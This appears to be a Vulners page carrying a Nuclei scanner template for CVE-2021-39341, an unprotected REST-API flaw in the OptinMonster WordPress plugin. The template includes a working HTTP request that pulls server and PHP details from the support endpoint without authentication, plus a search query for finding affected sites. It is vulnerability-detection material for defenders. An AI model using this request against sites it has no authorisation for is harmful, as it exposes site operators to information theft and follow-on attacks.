| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| CVE-2021-39341 | 29 Oct 202118:01 | – | circl | |
| WordPress plugin Google Maps Easy安全漏洞 | 1 Nov 202100:00 | – | cnnvd | |
| CVE-2021-39341 | 1 Nov 202121:01 | – | cve | |
| CVE-2021-39341 OptinMonster <= 2.6.4 Unprotected REST-API Endpoints | 1 Nov 202121:01 | – | cvelist | |
| Update your OptinMonster WordPress plugin immediately | 29 Oct 202114:35 | – | malwarebytes | |
| CVE-2021-39341 | 1 Nov 202121:15 | – | nvd | |
| WordPress OptinMonster Plugin < 2.6.5 API Vulnerability | 16 Nov 202100:00 | – | openvas | |
| CVE-2021-39341 | 1 Nov 202121:15 | – | osv | |
| WordPress OptinMonster plugin <= 2.6.4 - Unprotected REST-API to Sensitive Information Disclosure and Unauthorized API access vulnerability | 27 Oct 202100:00 | – | patchstack | |
| Authorization | 1 Nov 202121:15 | – | prion |
id: CVE-2021-39341
info:
name: OptinMonster Plugin < 2.6.5 - Unprotected REST-API
author: iamnoooob,pdresearch
severity: high
description: |
The OptinMonster WordPress plugin is vulnerable to sensitive information disclosure and unauthorized setting updates due to insufficient authorization validation via the logged_in_or_has_api_key function in the ~/OMAPI/RestApi.php file that can used to exploit inject malicious web scripts on sites with the plugin installed. This affects versions up to, and including, 2.6.4.
impact: |
Unauthenticated attackers can access sensitive system information including PHP version, server configuration, and plugin details via unprotected REST API endpoints.
remediation: |
Upgrade to OptinMonster version 2.6.5 or later.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-39341
- https://plugins.trac.wordpress.org/browser/optinmonster/trunk/OMAPI/RestApi.php?rev=2606519#L1460
- https://wordfence.com/vulnerability-advisories/#CVE-2021-39341
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2021-39341
cwe-id: CWE-285,CWE-863
epss-score: 0.2327
epss-percentile: 0.97497
cpe: cpe:2.3:a:optinmonster:optinmonster:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: optinmonster
product: optinmonster
framework: wordpress
publicwww-query: "/wp-content/plugins/optinmonster"
tags: cve,cve221,wordpress,wp-plugin,optinmonster,rest-api,disclosure,unauth,exposure,vkev,vuln
http:
- raw:
- |
OPTIONS /wp-json/omapp/v1/support HTTP/1.1
Host: {{Hostname}}
X-HTTP-Method-Override: GET
Referer: https://wp.app.optinmonster.test
matchers:
- type: word
part: body
words:
- "PHP Version"
- "OptinMonster"
- '"functions.php"'
- "Server Info"
condition: and
# digest: 4b0a00483046022100a25db9a33381e4cb783bc4019565b247e4a8937d910b74c09b470d32a41bbde5022100e8230dd680da9ec569a807bfe9d450d3ef732f74ac885c5b28c260aae76c6bc5:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation